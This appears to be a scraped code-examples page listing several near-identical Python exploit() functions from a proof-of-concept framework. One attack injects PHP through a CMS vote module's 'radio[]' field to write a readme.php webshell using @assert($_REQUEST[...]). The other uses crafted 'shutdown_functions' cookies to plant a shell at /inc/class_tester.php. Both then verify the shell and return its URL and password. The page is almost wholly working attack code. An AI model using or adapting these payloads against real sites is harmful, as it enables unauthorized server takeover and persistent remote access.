Esempio n. 1
0
    def exploit(cls, args):
        vul_url = args['options']['target']
        php = PhpShell()
        php._content = '<?php var_dump(md5(123));@assert($_REQUEST[{0}]);'
        # You can set your own password with these two following ways:
        # pwd = 'your_pwd'
        # php.set_pwd(pwd)
        # for more instructions, check these files in utils/payload/webshell
        ids = cls.get_vote_links(args)
        if ids:
            for i in ids:
                vul_path = '/index.php?m=vote&c=index&a=post&subjectid=%s&siteid=1' % str(
                    i)
                exploit_url = vul_url + vul_path
                if args['options']['verbose']:
                    print '[*] Request URL: ' + exploit_url
                payload = {
                    'subjectid':
                    i,
                    'radio[]':
                    ');fputs(fopen(base64_decode(cmVhZG1lLnBocA),w),'
                    'base64_decode(%s));\x80' %
                    b64.b64encode(php.get_content()).replace('=', '')
                }

                requests.post(exploit_url, data=payload)
                v_path = '/index.php?m=vote&c=index&a=result&subjectid=%s&siteid=1' % str(
                    i)
                requests.get(vul_url + v_path)
                shell_url = vul_url + '/readme.php'

                if php.check(shell_url):
                    args['success'] = True
                    args['poc_ret']['vul_url'] = vul_url
                    args['poc_ret']['Webshell'] = shell_url
                    args['poc_ret']['Webshell_PWD'] = php.get_pwd()
                    return args
                else:
                    args['success'] = False
        else:
            args['success'] = False

        return args
    def exploit(cls, args):
        vul_url = args['options']['target']
        shell_url = vul_url + '/inc/class_tester.php'
        php = PhpShell()
        cls.cookies['shutdown_functions[0][arguments][]'] = \
            cls.cookies['shutdown_functions[0][arguments][]'].format(b64encode(php.get_content()))
        if args['options']['verbose']:
            print '[*] Request URL: ' + vul_url
            print '[*] Payload Content: ' + cls.cookies['shutdown_functions[0][arguments][]']
        requests.get(vul_url, cookies=cls.cookies)

        if php.check(shell_url):
            args['success'] = True
            args['poc_ret']['vul_url'] = vul_url
            args['poc_ret']['Webshell'] = shell_url
            args['poc_ret']['Webshell_PWD'] = php.get_pwd()
            return args
        else:
            args['success'] = False
            return args
Esempio n. 3
0
    def exploit(cls, args):
        vul_url = args['options']['target']
        shell_url = vul_url + '/inc/class_tester.php'
        php = PhpShell()
        cls.cookies['shutdown_functions[0][arguments][]'] = \
            cls.cookies['shutdown_functions[0][arguments][]'].format(b64encode(php.get_content()))
        if args['options']['verbose']:
            print '[*] Request URL: ' + vul_url
            print '[*] Payload Content: ' + cls.cookies['shutdown_functions[0][arguments][]']
        requests.get(vul_url, cookies=cls.cookies)

        if php.check(shell_url):
            args['success'] = True
            args['poc_ret']['vul_url'] = vul_url
            args['poc_ret']['Webshell'] = shell_url
            args['poc_ret']['Webshell_PWD'] = php.get_pwd()
            return args
        else:
            args['success'] = False
            return args
Esempio n. 4
0
    def exploit(cls, args):
        vul_url = args['options']['target']
        php = PhpShell()
        php._content = '<?php var_dump(md5(123));@assert($_REQUEST[{0}]);'
        # You can set your own password with these two following ways:
        # pwd = 'your_pwd'
        # php.set_pwd(pwd)
        # for more instructions, check these files in utils/payload/webshell
        ids = cls.get_vote_links(args)
        if ids:
            for i in ids:
                vul_path = '/index.php?m=vote&c=index&a=post&subjectid=%s&siteid=1' % str(i)
                exploit_url = vul_url + vul_path
                if args['options']['verbose']:
                    print '[*] Request URL: ' + exploit_url
                payload = {
                    'subjectid': i,
                    'radio[]': ');fputs(fopen(base64_decode(cmVhZG1lLnBocA),w),'
                               'base64_decode(%s));\x80' % b64.b64encode(php.get_content()).replace('=', '')
                }

                requests.post(exploit_url, data=payload)
                v_path = '/index.php?m=vote&c=index&a=result&subjectid=%s&siteid=1' % str(i)
                requests.get(vul_url + v_path)
                shell_url = vul_url + '/readme.php'

                if php.check(shell_url):
                    args['success'] = True
                    args['poc_ret']['vul_url'] = vul_url
                    args['poc_ret']['Webshell'] = shell_url
                    args['poc_ret']['Webshell_PWD'] = php.get_pwd()
                    return args
                else:
                    args['success'] = False
        else:
            args['success'] = False

        return args
Esempio n. 5
0
    def exploit(cls, args):
        vul_url = args["options"]["target"]
        php = PhpShell()
        php._content = "<?php var_dump(md5(123));@assert($_REQUEST[{0}]);"
        # You can set your own password with these two following ways:
        # pwd = 'your_pwd'
        # php.set_pwd(pwd)
        # for more instructions, check these files in utils/payload/webshell
        ids = cls.get_vote_links(args)
        if ids:
            for i in ids:
                vul_path = "/index.php?m=vote&c=index&a=post&subjectid=%s&siteid=1" % str(i)
                exploit_url = vul_url + vul_path
                if args["options"]["verbose"]:
                    print "[*] Request URL: " + exploit_url
                payload = {
                    "subjectid": i,
                    "radio[]": ");fputs(fopen(base64_decode(cmVhZG1lLnBocA),w),"
                    "base64_decode(%s));\x80" % b64.b64encode(php.get_content()).replace("=", ""),
                }

                requests.post(exploit_url, data=payload)
                v_path = "/index.php?m=vote&c=index&a=result&subjectid=%s&siteid=1" % str(i)
                requests.get(vul_url + v_path)
                shell_url = vul_url + "/readme.php"

                if php.check(shell_url):
                    args["success"] = True
                    args["poc_ret"]["vul_url"] = vul_url
                    args["poc_ret"]["Webshell"] = shell_url
                    args["poc_ret"]["Webshell_PWD"] = php.get_pwd()
                    return args
                else:
                    args["success"] = False
        else:
            args["success"] = False

        return args
Esempio n. 6
0
    def exploit(cls, args):
        vul_url = args['options']['target']
        shell_url = vul_url + '/inc/class_tester.php'
        php = PhpShell()
        # You can set your own password with these two following ways:
        # pwd = 'your_pwd'
        # php = PhpShell(pwd=pwd)
        # or 
        # php.set_pwd(pwd)
        # for more instructions, check these files in utils/payload/webshell
        cls.cookies['shutdown_functions[0][arguments][]'] = \
            cls.cookies['shutdown_functions[0][arguments][]'].format(b64encode(php.get_content()))
        if args['options']['verbose']:
            print '[*] Request URL: ' + vul_url
            print '[*] Payload Content: ' + cls.cookies['shutdown_functions[0][arguments][]']
        requests.get(vul_url, cookies=cls.cookies)

        if php.check(shell_url):
            args['success'] = True
            args['poc_ret']['vul_url'] = vul_url
            args['poc_ret']['Webshell'] = shell_url
            args['poc_ret']['Webshell_PWD'] = php.get_pwd()  # or your own pwd if you've set it manually
        return args